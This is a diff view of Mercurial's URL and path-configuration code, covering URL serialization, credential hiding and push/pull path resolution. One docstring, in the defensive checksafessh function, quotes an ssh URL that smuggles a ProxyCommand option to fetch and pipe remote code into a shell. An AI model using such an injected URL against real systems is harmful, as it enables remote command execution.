284 | 287 | >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) |
|
285 | 288 | 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' |
|
286 | 289 | >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) |
|
287 | 290 | 'http://user:pw@host:80/?foo=bar&baz=42' |
|
288 | 291 | >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) |
|
289 | 292 | 'http://user:pw@host:80/?foo=bar%3dbaz' |
|
290 | 293 | >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) |
|
291 | 294 | 'ssh://user:pw@[::1]:2200//home/joe#' |
|
292 | 295 | >>> bytes(url(b'http://localhost:80//')) |
|
293 | 296 | 'http://localhost:80//' |
|
294 | 297 | >>> bytes(url(b'http://localhost:80/')) |
|
295 | 298 | 'http://localhost:80/' |
|
296 | 299 | >>> bytes(url(b'http://localhost:80')) |
|
297 | 300 | 'http://localhost:80/' |
|
298 | 301 | >>> bytes(url(b'bundle:foo')) |
|
299 | 302 | 'bundle:foo' |
|
300 | 303 | >>> bytes(url(b'bundle://../foo')) |
|
301 | 304 | 'bundle:../foo' |
|
302 | 305 | >>> bytes(url(b'path')) |
|
303 | 306 | 'path' |
|
304 | 307 | >>> bytes(url(b'file:///tmp/foo/bar')) |
|
305 | 308 | 'file:///tmp/foo/bar' |
|
306 | 309 | >>> bytes(url(b'file:///c:/tmp/foo/bar')) |
|
307 | 310 | 'file:///c:/tmp/foo/bar' |
|
308 | 311 | >>> print(url(br'bundle:foo\bar')) |
|
309 | 312 | bundle:foo\bar |
|
310 | 313 | >>> print(url(br'file:///D:\data\hg')) |
|
311 | 314 | file:///D:\data\hg |
|
312 | 315 | """ |
|
313 | 316 | if self._localpath: |
|
314 | 317 | s = self.path |
|
315 | 318 | if self.scheme == b'bundle': |
|
316 | 319 | s = b'bundle:' + s |
|
317 | 320 | if self.fragment: |
|
318 | 321 | s += b'#' + self.fragment |
|
319 | 322 | return s |
|
320 | 323 | |
|
321 | 324 | s = self.scheme + b':' |
|
322 | 325 | if self.user or self.passwd or self.host: |
|
323 | 326 | s += b'//' |
|
324 | 327 | elif self.scheme and ( |
|
325 | 328 | not self.path |
|
326 | 329 | or self.path.startswith(b'/') |
|
327 | 330 | or hasdriveletter(self.path) |
|
328 | 331 | ): |
|
329 | 332 | s += b'//' |
|
330 | 333 | if hasdriveletter(self.path): |
|
331 | 334 | s += b'/' |
|
332 | 335 | if self.user: |
|
333 | 336 | s += urlreq.quote(self.user, safe=self._safechars) |
|
334 | 337 | if self.passwd: |
|
335 | 338 | s += b':' + urlreq.quote(self.passwd, safe=self._safechars) |
|
336 | 339 | if self.user or self.passwd: |
|
337 | 340 | s += b'@' |
|
338 | 341 | if self.host: |
|
339 | 342 | if not (self.host.startswith(b'[') and self.host.endswith(b']')): |
|
340 | 343 | s += urlreq.quote(self.host) |
|
341 | 344 | else: |
|
342 | 345 | s += self.host |
|
343 | 346 | if self.port: |
|
344 | 347 | s += b':' + urlreq.quote(self.port) |
|
345 | 348 | if self.host: |
|
346 | 349 | s += b'/' |
|
347 | 350 | if self.path: |
|
348 | 351 | # TODO: similar to the query string, we should not unescape the |
|
349 | 352 | # path when we store it, the path might contain '%2f' = '/', |
|
350 | 353 | # which we should *not* escape. |
|
351 | 354 | s += urlreq.quote(self.path, safe=self._safepchars) |
|
352 | 355 | if self.query: |
|
353 | 356 | # we store the query in escaped form. |
|
354 | 357 | s += b'?' + self.query |
|
355 | 358 | if self.fragment is not None: |
|
356 | 359 | s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) |
|
357 | 360 | return s |
|
358 | 361 | |
|
359 | 362 | __str__ = encoding.strmethod(__bytes__) |
|
360 | 363 | |
|
361 | 364 | def authinfo(self): |
|
362 | 365 | user, passwd = self.user, self.passwd |
|
363 | 366 | try: |
|
364 | 367 | self.user, self.passwd = None, None |
|
365 | 368 | s = bytes(self) |
|
366 | 369 | finally: |
|
367 | 370 | self.user, self.passwd = user, passwd |
|
368 | 371 | if not self.user: |
|
369 | 372 | return (s, None) |
|
370 | 373 | # authinfo[1] is passed to urllib2 password manager, and its |
|
371 | 374 | # URIs must not contain credentials. The host is passed in the |
|
372 | 375 | # URIs list because Python < 2.4.3 uses only that to search for |
|
373 | 376 | # a password. |
|
374 | 377 | return (s, (None, (s, self.host), self.user, self.passwd or b'')) |
|
375 | 378 | |
|
376 | 379 | def isabs(self): |
|
377 | 380 | if self.scheme and self.scheme != b'file': |
|
378 | 381 | return True # remote URL |
|
379 | 382 | if hasdriveletter(self.path): |
|
380 | 383 | return True # absolute for our purposes - can't be joined() |
|
381 | 384 | if self.path.startswith(br'\\'): |
|
382 | 385 | return True # Windows UNC path |
|
383 | 386 | if self.path.startswith(b'/'): |
|
384 | 387 | return True # POSIX-style |
|
385 | 388 | return False |
|
386 | 389 | |
|
387 | 390 | def localpath(self) -> bytes: |
|
388 | 391 | if self.scheme == b'file' or self.scheme == b'bundle': |
|
389 | 392 | path = self.path or b'/' |
|
390 | 393 | # For Windows, we need to promote hosts containing drive |
|
391 | 394 | # letters to paths with drive letters. |
|
392 | 395 | if hasdriveletter(self._hostport): |
|
393 | 396 | path = self._hostport + b'/' + self.path |
|
394 | 397 | elif ( |
|
395 | 398 | self.host is not None and self.path and not hasdriveletter(path) |
|
396 | 399 | ): |
|
397 | 400 | path = b'/' + path |
|
398 | 401 | return path |
|
399 | 402 | return self._origpath |
|
400 | 403 | |
|
401 | 404 | def islocal(self): |
|
402 | 405 | '''whether localpath will return something that posixfile can open''' |
|
403 | 406 | return ( |
|
404 | 407 | not self.scheme |
|
405 | 408 | or self.scheme == b'file' |
|
406 | 409 | or self.scheme == b'bundle' |
|
407 | 410 | ) |
|
408 | 411 | |
|
409 | 412 | |
|
410 | 413 | def hasscheme(path: bytes) -> bool: |
|
411 | 414 | return bool(url(path).scheme) # cast to help pytype |
|
412 | 415 | |
|
413 | 416 | |
|
414 | 417 | def hasdriveletter(path: bytes) -> bool: |
|
415 | 418 | return bool(path) and path[1:2] == b':' and path[0:1].isalpha() |
|
416 | 419 | |
|
417 | 420 | |
|
418 | 421 | def urllocalpath(path: bytes) -> bytes: |
|
419 | 422 | return url(path, parsequery=False, parsefragment=False).localpath() |
|
420 | 423 | |
|
421 | 424 | |
|
422 | 425 | def checksafessh(path: bytes) -> None: |
|
423 | 426 | """check if a path / url is a potentially unsafe ssh exploit (SEC) |
|
424 | 427 | |
|
425 | 428 | This is a sanity check for ssh urls. ssh will parse the first item as |
|
426 | 429 | an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. |
|
427 | 430 | Let's prevent these potentially exploited urls entirely and warn the |
|
428 | 431 | user. |
|
429 | 432 | |
|
430 | 433 | Raises an error.Abort when the url is unsafe. |
|
431 | 434 | """ |
|
432 | 435 | path = urlreq.unquote(path) |
|
433 | 436 | if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): |
|
434 | 437 | raise error.Abort( |
|
435 | 438 | _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) |
|
436 | 439 | ) |
|
437 | 440 | |
|
438 | 441 | |
|
439 | 442 | def hidepassword(u: bytes) -> bytes: |
|
440 | 443 | '''hide user credential in a url string''' |
|
441 | 444 | u = url(u) |
|
442 | 445 | if u.passwd: |
|
443 | 446 | u.passwd = b'***' |
|
444 | 447 | return bytes(u) |
|
445 | 448 | |
|
446 | 449 | |
|
447 | 450 | def removeauth(u: bytes) -> bytes: |
|
448 | 451 | '''remove all authentication information from a url string''' |
|
449 | 452 | u = url(u) |
|
450 | 453 | u.user = u.passwd = None |
|
451 | 454 | return bytes(u) |
|
452 | 455 | |
|
453 | 456 | |
|
454 | 457 | def list_paths(ui, target_path=None): |
|
455 | 458 | """list all the (name, paths) in the passed ui""" |
|
456 | 459 | result = [] |
|
457 | 460 | if target_path is None: |
|
458 | 461 | for name, paths in sorted(ui.paths.items()): |
|
459 | 462 | for p in paths: |
|
460 | 463 | result.append((name, p)) |
|
461 | 464 | |
|
462 | 465 | else: |
|
463 | 466 | for path in ui.paths.get(target_path, []): |
|
464 | 467 | result.append((target_path, path)) |
|
465 | 468 | return result |
|
466 | 469 | |
|
467 | 470 | |
|
468 | 471 | def try_path(ui, url): |
|
469 | 472 | """try to build a path from a url |
|
470 | 473 | |
|
471 | 474 | Return None if no Path could built. |
|
472 | 475 | """ |
|
473 | 476 | try: |
|
474 | 477 | # we pass the ui instance are warning might need to be issued |
|
475 | 478 | return path(ui, None, rawloc=url) |
|
476 | 479 | except ValueError: |
|
477 | 480 | return None |
|
478 | 481 | |
|
479 | 482 | |
|
480 | 483 | def get_push_paths(repo, ui, dests): |
|
481 | 484 | """yields all the `path` selected as push destination by `dests`""" |
|
482 | 485 | if not dests: |
|
483 | 486 | if b'default-push' in ui.paths: |
|
484 | 487 | for p in ui.paths[b'default-push']: |
|
485 | 488 | yield p.get_push_variant() |
|
486 | 489 | elif b'default' in ui.paths: |
|
487 | 490 | for p in ui.paths[b'default']: |
|
488 | 491 | yield p.get_push_variant() |
|
489 | 492 | else: |
|
490 | 493 | raise error.ConfigError( |
|
491 | 494 | _(b'default repository not configured!'), |
|
492 | 495 | hint=_(b"see 'hg help config.paths'"), |
|
493 | 496 | ) |
|
494 | 497 | else: |
|
495 | 498 | for dest in dests: |
|
496 | 499 | if dest in ui.paths: |
|
497 | 500 | for p in ui.paths[dest]: |
|
498 | 501 | yield p.get_push_variant() |
|
499 | 502 | else: |
|
500 | 503 | path = try_path(ui, dest) |
|
501 | 504 | if path is None: |
|
502 | 505 | msg = _(b'repository %s does not exist') |
|
503 | 506 | msg %= dest |
|
504 | 507 | raise error.RepoError(msg) |
|
505 | 508 | yield path.get_push_variant() |
|
506 | 509 | |
|
507 | 510 | |
|
508 | 511 | def get_pull_paths(repo, ui, sources): |
|
509 | 512 | """yields all the `(path, branch)` selected as pull source by `sources`""" |
|
510 | 513 | if not sources: |
|
511 | 514 | sources = [b'default'] |
|
512 | 515 | for source in sources: |
|
513 | 516 | if source in ui.paths: |
|
514 | 517 | for p in ui.paths[source]: |
|
515 | 518 | yield p |
|
516 | 519 | else: |
|
517 | 520 | p = path(ui, None, source, validate_path=False) |
|
518 | 521 | yield p |
|
519 | 522 | |
|
520 | 523 | |
|
521 | 524 | def get_unique_push_path(action, repo, ui, dest=None): |
|
522 | 525 | """return a unique `path` or abort if multiple are found |
|
523 | 526 | |
|
524 | 527 | This is useful for command and action that does not support multiple |
|
525 | 528 | destination (yet). |
|
526 | 529 | |
|
527 | 530 | The `action` parameter will be used for the error message. |
|
528 | 531 | """ |
|
529 | 532 | if dest is None: |
|
530 | 533 | dests = [] |
|
531 | 534 | else: |
|
532 | 535 | dests = [dest] |
|
533 | 536 | dests = list(get_push_paths(repo, ui, dests)) |
|
534 | 537 | if len(dests) != 1: |
|
535 | 538 | if dest is None: |
|
536 | 539 | msg = _( |
|
537 | 540 | b"default path points to %d urls while %s only supports one" |
|
538 | 541 | ) |
|
539 | 542 | msg %= (len(dests), action) |
|
540 | 543 | else: |
|
541 | 544 | msg = _(b"path points to %d urls while %s only supports one: %s") |
|
542 | 545 | msg %= (len(dests), action, dest) |
|
543 | 546 | raise error.Abort(msg) |
|
544 | 547 | return dests[0] |
|
545 | 548 | |
|
546 | 549 | |
|
547 | 550 | def get_unique_pull_path_obj(action, ui, source=None): |
|
548 | 551 | """return a unique `(path, branch)` or abort if multiple are found |
|
549 | 552 | |
|
550 | 553 | This is useful for command and action that does not support multiple |
|
551 | 554 | destination (yet). |
|
552 | 555 | |
|
553 | 556 | The `action` parameter will be used for the error message. |
|
554 | 557 | |
|
555 | 558 | note: Ideally, this function would be called `get_unique_pull_path` to |
|
556 | 559 | mirror the `get_unique_push_path`, but the name was already taken. |
|
557 | 560 | """ |
|
558 | 561 | sources = [] |
|
559 | 562 | if source is not None: |
|
560 | 563 | sources.append(source) |
|
561 | 564 | |
|
562 | 565 | pull_paths = list(get_pull_paths(None, ui, sources=sources)) |
|
563 | 566 | path_count = len(pull_paths) |
|
564 | 567 | if path_count != 1: |
|
565 | 568 | if source is None: |
|
566 | 569 | msg = _( |
|
567 | 570 | b"default path points to %d urls while %s only supports one" |
|
568 | 571 | ) |
|
569 | 572 | msg %= (path_count, action) |
|
570 | 573 | else: |
|
571 | 574 | msg = _(b"path points to %d urls while %s only supports one: %s") |
|
572 | 575 | msg %= (path_count, action, source) |
|
573 | 576 | raise error.Abort(msg) |
|
574 | 577 | return pull_paths[0] |
|
575 | 578 | |
|
576 | 579 | |
|
577 | 580 | def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): |
|
578 | 581 | """return a unique `(url, branch)` or abort if multiple are found |
|
579 | 582 | |
|
580 | 583 | See `get_unique_pull_path_obj` for details. |
|
581 | 584 | """ |
|
582 | 585 | path = get_unique_pull_path_obj(action, ui, source=source) |
|
583 | 586 | return parseurl(path.rawloc, default_branches) |
|
584 | 587 | |
|
585 | 588 | |
|
586 | 589 | def get_clone_path_obj(ui, source): |
|
587 | 590 | """return the `(origsource, url, branch)` selected as clone source""" |
|
588 | 591 | if source == b'': |
|
589 | 592 | return None |
|
590 | 593 | return get_unique_pull_path_obj(b'clone', ui, source=source) |
|
591 | 594 | |
|
592 | 595 | |
|
593 | 596 | def get_clone_path(ui, source, default_branches=None): |
|
594 | 597 | """return the `(origsource, url, branch)` selected as clone source""" |
|
595 | 598 | path = get_clone_path_obj(ui, source) |
|
596 | 599 | if path is None: |
|
597 | 600 | return (b'', b'', (None, default_branches)) |
|
598 | 601 | if default_branches is None: |
|
599 | 602 | default_branches = [] |
|
600 | 603 | branches = (path.branch, default_branches) |
|
601 | 604 | return path.rawloc, path.loc, branches |
|
602 | 605 | |
|
603 | 606 | |
|
604 | 607 | def parseurl(path, branches=None): |
|
605 | 608 | '''parse url#branch, returning (url, (branch, branches))''' |
|
606 | 609 | u = url(path) |
|
607 | 610 | branch = None |
|
608 | 611 | if u.fragment: |
|
609 | 612 | branch = u.fragment |
|
610 | 613 | u.fragment = None |
|
611 | 614 | return bytes(u), (branch, branches or []) |
|
612 | 615 | |
|
613 | 616 | |
|
614 | 617 | class paths(dict): |
|
615 | 618 | """Represents a collection of paths and their configs. |
|
616 | 619 | |
|
617 | 620 | Data is initially derived from ui instances and the config files they have |
|
618 | 621 | loaded. |
|
619 | 622 | """ |
|
620 | 623 | |
|
621 | 624 | def __init__(self, ui): |
|
622 | 625 | dict.__init__(self) |
|
623 | 626 | |
|
624 | 627 | home_path = os.path.expanduser(b'~') |
|
625 | 628 | |
|
626 | 629 | for name, value in ui.configitems(b'paths', ignoresub=True): |
|
627 | 630 | # No location is the same as not existing. |
|
628 | 631 | if not value: |
|
629 | 632 | continue |
|
630 | 633 | _value, sub_opts = ui.configsuboptions(b'paths', name) |
|
631 | 634 | s = ui.configsource(b'paths', name) |
|
632 | 635 | root_key = (name, value, s) |
|
633 | 636 | root = ui._path_to_root.get(root_key, home_path) |
|
634 | 637 | |
|
635 | 638 | multi_url = sub_opts.get(b'multi-urls') |
|
636 | 639 | if multi_url is not None and stringutil.parsebool(multi_url): |
|
637 | 640 | base_locs = stringutil.parselist(value) |
|
638 | 641 | else: |
|
639 | 642 | base_locs = [value] |
|
640 | 643 | |
|
641 | 644 | paths = [] |
|
642 | 645 | for loc in base_locs: |
|
643 | 646 | loc = os.path.expandvars(loc) |
|
644 | 647 | loc = os.path.expanduser(loc) |
|
645 | 648 | if not hasscheme(loc) and not os.path.isabs(loc): |
|
646 | 649 | loc = os.path.normpath(os.path.join(root, loc)) |
|
647 | 650 | p = path(ui, name, rawloc=loc, suboptions=sub_opts) |
|
648 | 651 | paths.append(p) |
|
649 | 652 | self[name] = paths |
|
650 | 653 | |
|
651 | 654 | for name, old_paths in sorted(self.items()): |
|
652 | 655 | new_paths = [] |
|
653 | 656 | for p in old_paths: |
|
654 | 657 | new_paths.extend(_chain_path(p, ui, self)) |
|
655 | 658 | self[name] = new_paths |
|
656 | 659 | |
|
657 | 660 | |
|
658 | 661 | _pathsuboptions: "Dict[bytes, Tuple[str, Callable]]" = {} |
|
659 | 662 | # a dictionnary of methods that can be used to format a sub-option value |
|
660 | 663 | path_suboptions_display = {} |
|
661 | 664 | |
|
662 | 665 | |
|
663 | 666 | def pathsuboption(option: bytes, attr: str, display=pycompat.bytestr): |
|
664 | 667 | """Decorator used to declare a path sub-option. |
|
665 | 668 | |
|
666 | 669 | Arguments are the sub-option name and the attribute it should set on |
|
667 | 670 | ``path`` instances. |
|
668 | 671 | |
|
669 | 672 | The decorated function will receive as arguments a ``ui`` instance, |
|
670 | 673 | ``path`` instance, and the string value of this option from the config. |
|
671 | 674 | The function should return the value that will be set on the ``path`` |
|
672 | 675 | instance. |
|
673 | 676 | |
|
674 | 677 | The optional `display` argument is a function that can be used to format |
|
675 | 678 | the value when displayed to the user (like in `hg paths` for example). |
|
676 | 679 | |
|
677 | 680 | This decorator can be used to perform additional verification of |
|
678 | 681 | sub-options and to change the type of sub-options. |
|
679 | 682 | """ |
|
680 | 683 | if isinstance(attr, bytes): |
|
681 | 684 | msg = b'pathsuboption take `str` as "attr" argument, not `bytes`' |
|
682 | 685 | raise TypeError(msg) |
|
683 | 686 | |
|
684 | 687 | def register(func): |
|
685 | 688 | _pathsuboptions[option] = (attr, func) |
|
686 | 689 | path_suboptions_display[option] = display |
|
687 | 690 | return func |
|
688 | 691 | |
|
689 | 692 | return register |
|
690 | 693 | |
|
691 | 694 | |
|
692 | 695 | def display_bool(value): |
|
693 | 696 | """display a boolean suboption back to the user""" |
|
694 | 697 | return b'yes' if value else b'no' |
|
695 | 698 | |
|
696 | 699 | |
|
697 | 700 | @pathsuboption(b'pushurl', '_pushloc') |
|
698 | 701 | def pushurlpathoption(ui, path, value): |
|
699 | 702 | u = url(value) |
|
700 | 703 | # Actually require a URL. |
|
701 | 704 | if not u.scheme: |
|
702 | 705 | msg = _(b'(paths.%s:pushurl not a URL; ignoring: "%s")\n') |
|
703 | 706 | msg %= (path.name, value) |
|
704 | 707 | ui.warn(msg) |
|
705 | 708 | return None |
|
706 | 709 | |
|
707 | 710 | # Don't support the #foo syntax in the push URL to declare branch to |
|
708 | 711 | # push. |
|
709 | 712 | if u.fragment: |
|
710 | 713 | ui.warn( |
|
711 | 714 | _( |
|
712 | 715 | b'("#fragment" in paths.%s:pushurl not supported; ' |
|
713 | 716 | b'ignoring)\n' |
|
714 | 717 | ) |
|
715 | 718 | % path.name |
|
716 | 719 | ) |
|
717 | 720 | u.fragment = None |
|
718 | 721 | |
|
719 | 722 | return bytes(u) |
|
720 | 723 | |
|
721 | 724 | |
|
722 | 725 | @pathsuboption(b'pushrev', 'pushrev') |
|
723 | 726 | def pushrevpathoption(ui, path, value): |
|
724 | 727 | return value |
|
725 | 728 | |
|
726 | 729 | |
|
727 | 730 | SUPPORTED_BOOKMARKS_MODES = { |
|
728 | 731 | b'default', |
|
729 | 732 | b'mirror', |
|
730 | 733 | b'ignore', |
|
731 | 734 | } |
|
732 | 735 | |
|
733 | 736 | |
|
734 | 737 | @pathsuboption(b'bookmarks.mode', 'bookmarks_mode') |
|
735 | 738 | def bookmarks_mode_option(ui, path, value): |
|
736 | 739 | if value not in SUPPORTED_BOOKMARKS_MODES: |
|
737 | 740 | path_name = path.name |
|
738 | 741 | if path_name is None: |
|
739 | 742 | # this is an "anonymous" path, config comes from the global one |
|
740 | 743 | path_name = b'*' |
|
741 | 744 | msg = _(b'(paths.%s:bookmarks.mode has unknown value: "%s")\n') |
|
742 | 745 | msg %= (path_name, value) |
|
743 | 746 | ui.warn(msg) |
|
744 | 747 | if value == b'default': |
|
745 | 748 | value = None |
|
746 | 749 | return value |
|
747 | 750 | |
|
748 | 751 | |
|
749 | 752 | DELTA_REUSE_POLICIES = { |
|
750 | 753 | b'default': None, |
|
751 | 754 | b'try-base': revlog_constants.DELTA_BASE_REUSE_TRY, |
|
752 | 755 | b'no-reuse': revlog_constants.DELTA_BASE_REUSE_NO, |
|
753 | 756 | b'forced': revlog_constants.DELTA_BASE_REUSE_FORCE, |
|
754 | 757 | } |
|
755 | 758 | DELTA_REUSE_POLICIES_NAME = dict(i[::-1] for i in DELTA_REUSE_POLICIES.items()) |
|
756 | 759 | |
|
757 | 760 | |
|
758 | 761 | @pathsuboption( |
|
759 | 762 | b'pulled-delta-reuse-policy', |
|
760 | 763 | 'delta_reuse_policy', |
|
761 | 764 | display=DELTA_REUSE_POLICIES_NAME.get, |
|
762 | 765 | ) |
|
763 | 766 | def delta_reuse_policy(ui, path, value): |
|
764 | 767 | if value not in DELTA_REUSE_POLICIES: |
|
765 | 768 | path_name = path.name |
|
766 | 769 | if path_name is None: |
|
767 | 770 | # this is an "anonymous" path, config comes from the global one |
|
768 | 771 | path_name = b'*' |
|
769 | 772 | msg = _( |
|
770 | 773 | b'(paths.%s:pulled-delta-reuse-policy has unknown value: "%s")\n' |
|
771 | 774 | ) |
|
772 | 775 | msg %= (path_name, value) |
|
773 | 776 | ui.warn(msg) |
|
774 | 777 | return DELTA_REUSE_POLICIES.get(value) |
|
775 | 778 | |
|
776 | 779 | |
|
777 | 780 | @pathsuboption(b'multi-urls', 'multi_urls', display=display_bool) |
|
778 | 781 | def multiurls_pathoption(ui, path, value): |
|
779 | 782 | res = stringutil.parsebool(value) |
|
780 | 783 | if res is None: |
|
781 | 784 | ui.warn( |
|
782 | 785 | _(b'(paths.%s:multi-urls not a boolean; ignoring)\n') % path.name |
|
783 | 786 | ) |
|
784 | 787 | res = False |
|
785 | 788 | return res |
|
786 | 789 | |
|
787 | 790 | |
|
788 | 791 | def _chain_path(base_path, ui, paths): |
|
789 | 792 | """return the result of "path://" logic applied on a given path""" |
|
790 | 793 | new_paths = [] |
|
791 | 794 | if base_path.url.scheme != b'path': |
|
792 | 795 | new_paths.append(base_path) |
|
793 | 796 | else: |
|
794 | 797 | assert base_path.url.path is None |
|
795 | 798 | sub_paths = paths.get(base_path.url.host) |
|
796 | 799 | if sub_paths is None: |
|
797 | 800 | m = _(b'cannot use `%s`, "%s" is not a known path') |
|
798 | 801 | m %= (base_path.rawloc, base_path.url.host) |
|
799 | 802 | raise error.Abort(m) |
|
800 | 803 | for subpath in sub_paths: |
|
801 | 804 | path = base_path.copy() |
|
802 | 805 | if subpath.raw_url.scheme == b'path': |
|
803 | 806 | m = _(b'cannot use `%s`, "%s" is also defined as a `path://`') |
|
804 | 807 | m %= (path.rawloc, path.url.host) |
|
805 | 808 | raise error.Abort(m) |
|
806 | 809 | path.url = subpath.url |
|
807 | 810 | path.rawloc = subpath.rawloc |
|
808 | 811 | path.loc = subpath.loc |
|
809 | 812 | if path.branch is None: |
|
810 | 813 | path.branch = subpath.branch |
|
811 | 814 | else: |
|
812 | 815 | base = path.rawloc.rsplit(b'#', 1)[0] |
|
813 | 816 | path.rawloc = b'%s#%s' % (base, path.branch) |
|
814 | 817 | suboptions = subpath._all_sub_opts.copy() |
|
815 | 818 | suboptions.update(path._own_sub_opts) |
|
816 | 819 | path._apply_suboptions(ui, suboptions) |
|
817 | 820 | new_paths.append(path) |
|
818 | 821 | return new_paths |
|
819 | 822 | |
|
820 | 823 | |
|
821 | 824 | class path: |
|
822 | 825 | """Represents an individual path and its configuration.""" |
|
823 | 826 | |
|
824 | 827 | def __init__( |
|
825 | 828 | self, |
|
826 | 829 | ui=None, |
|
827 | 830 | name=None, |
|
828 | 831 | rawloc=None, |
|
829 | 832 | suboptions=None, |
|
830 | 833 | validate_path=True, |
|
831 | 834 | ): |
|
832 | 835 | """Construct a path from its config options. |
|
833 | 836 | |
|
834 | 837 | ``ui`` is the ``ui`` instance the path is coming from. |
|
835 | 838 | ``name`` is the symbolic name of the path. |
|
836 | 839 | ``rawloc`` is the raw location, as defined in the config. |
|
837 | 840 | ``_pushloc`` is the raw locations pushes should be made to. |
|
838 | 841 | (see the `get_push_variant` method) |
|
839 | 842 | |
|
840 | 843 | If ``name`` is not defined, we require that the location be a) a local |
|
841 | 844 | filesystem path with a .hg directory or b) a URL. If not, |
|
842 | 845 | ``ValueError`` is raised. |
|
843 | 846 | """ |
|
844 | 847 | if ui is None: |
|
845 | 848 | # used in copy |
|
846 | 849 | assert name is None |
|
847 | 850 | assert rawloc is None |
|
848 | 851 | assert suboptions is None |
|
849 | 852 | return |
|
850 | 853 | |
|
851 | 854 | if not rawloc: |
|
852 | 855 | raise ValueError(b'rawloc must be defined') |
|
853 | 856 | |
|
854 | 857 | self.name = name |
|
855 | 858 | |
|
856 | 859 | # set by path variant to point to their "non-push" version |
|
857 | 860 | self.main_path = None |
|
858 | 861 | self._setup_url(rawloc) |
|
859 | 862 | |
|
860 | 863 | if validate_path: |
|
861 | 864 | self._validate_path() |
|
862 | 865 | |
|
863 | 866 | _path, sub_opts = ui.configsuboptions(b'paths', b'*') |
|
864 | 867 | self._own_sub_opts = {} |
|
865 | 868 | if suboptions is not None: |
|
866 | 869 | self._own_sub_opts = suboptions.copy() |
|
867 | 870 | sub_opts.update(suboptions) |
|
868 | 871 | self._all_sub_opts = sub_opts.copy() |
|
869 | 872 | |
|
870 | 873 | self._apply_suboptions(ui, sub_opts) |
|
871 | 874 | |
|
872 | 875 | def _setup_url(self, rawloc): |
|
873 | 876 | # Locations may define branches via syntax <base>#<branch>. |
|
874 | 877 | u = url(rawloc) |
|
875 | 878 | branch = None |
|
876 | 879 | if u.fragment: |
|
877 | 880 | branch = u.fragment |
|
878 | 881 | u.fragment = None |
|
879 | 882 | |
|
880 | 883 | self.url = u |
|
881 | 884 | # the url from the config/command line before dealing with `path://` |
|
882 | 885 | self.raw_url = u.copy() |
|
883 | 886 | self.branch = branch |
|
884 | 887 | |
|
885 | 888 | self.rawloc = rawloc |
|
886 | 889 | self.loc = b'%s' % u |
|
887 | 890 | |
|
888 | 891 | def copy(self, new_raw_location=None): |
|
889 | 892 | """make a copy of this path object |
|
890 | 893 | |
|
891 | 894 | When `new_raw_location` is set, the new path will point to it. |
|
892 | 895 | This is used by the scheme extension so expand the scheme. |
|
893 | 896 | """ |
|
894 | 897 | new = self.__class__() |
|
895 | 898 | for k, v in self.__dict__.items(): |
|
896 | 899 | new_copy = getattr(v, 'copy', None) |
|
897 | 900 | if new_copy is not None: |
|
898 | 901 | v = new_copy() |
|
899 | 902 | new.__dict__[k] = v |
|
900 | 903 | if new_raw_location is not None: |
|
901 | 904 | new._setup_url(new_raw_location) |
|
902 | 905 | return new |
|
903 | 906 | |
|
904 | 907 | @property |
|
905 | 908 | def is_push_variant(self): |
|
906 | 909 | """is this a path variant to be used for pushing""" |
|
907 | 910 | return self.main_path is not None |
|
908 | 911 | |
|
909 | 912 | def get_push_variant(self): |
|
910 | 913 | """get a "copy" of the path, but suitable for pushing |
|
911 | 914 | |
|
912 | 915 | This means using the value of the `pushurl` option (if any) as the url. |
|
913 | 916 | |
|
914 | 917 | The original path is available in the `main_path` attribute. |
|
915 | 918 | """ |
|
916 | 919 | if self.main_path: |
|
917 | 920 | return self |
|
918 | 921 | new = self.copy() |
|
919 | 922 | new.main_path = self |
|
920 | 923 | if self._pushloc: |
|
921 | 924 | new._setup_url(self._pushloc) |
|
922 | 925 | return new |
|
923 | 926 | |
|
924 | 927 | def _validate_path(self): |
|
925 | 928 | # When given a raw location but not a symbolic name, validate the |
|
926 | 929 | # location is valid. |
|
927 | 930 | if ( |
|
928 | 931 | not self.name |
|
929 | 932 | and not self.url.scheme |
|
930 | 933 | and not self._isvalidlocalpath(self.loc) |
|
931 | 934 | ): |
|
932 | 935 | raise ValueError( |
|
933 | 936 | b'location is not a URL or path to a local ' |
|
934 | 937 | b'repo: %s' % self.rawloc |
|
935 | 938 | ) |
|
936 | 939 | |
|
937 | 940 | def _apply_suboptions(self, ui, sub_options): |
|
938 | 941 | # Now process the sub-options. If a sub-option is registered, its |
|
939 | 942 | # attribute will always be present. The value will be None if there |
|
940 | 943 | # was no valid sub-option. |
|
941 | 944 | for suboption, (attr, func) in _pathsuboptions.items(): |
|
942 | 945 | if suboption not in sub_options: |
|
943 | 946 | setattr(self, attr, None) |
|
944 | 947 | continue |
|
945 | 948 | |
|
946 | 949 | value = func(ui, self, sub_options[suboption]) |
|
947 | 950 | setattr(self, attr, value) |
|
948 | 951 | |
|
949 | 952 | def _isvalidlocalpath(self, path): |
|
950 | 953 | """Returns True if the given path is a potentially valid repository. |
|
951 | 954 | This is its own function so that extensions can change the definition of |
|
952 | 955 | 'valid' in this case (like when pulling from a git repo into a hg |
|
953 | 956 | one).""" |
|
954 | 957 | try: |
|
955 | 958 | return os.path.isdir(os.path.join(path, b'.hg')) |
|
956 | 959 | # Python 2 may return TypeError. Python 3, ValueError. |
|
957 | 960 | except (TypeError, ValueError): |
|
958 | 961 | return False |
|
959 | 962 | |
|
960 | 963 | @property |
|
961 | 964 | def suboptions(self): |
|
962 | 965 | """Return sub-options and their values for this path. |
|
963 | 966 | |
|
964 | 967 | This is intended to be used for presentation purposes. |
|
965 | 968 | """ |
|
966 | 969 | d = {} |
|
967 | 970 | for subopt, (attr, _func) in _pathsuboptions.items(): |
|
968 | 971 | value = getattr(self, attr) |
|
969 | 972 | if value is not None: |
|
970 | 973 | d[subopt] = value |
|
971 | 974 | return d |
General Comments 0
You need to be logged in to leave comments.
Login now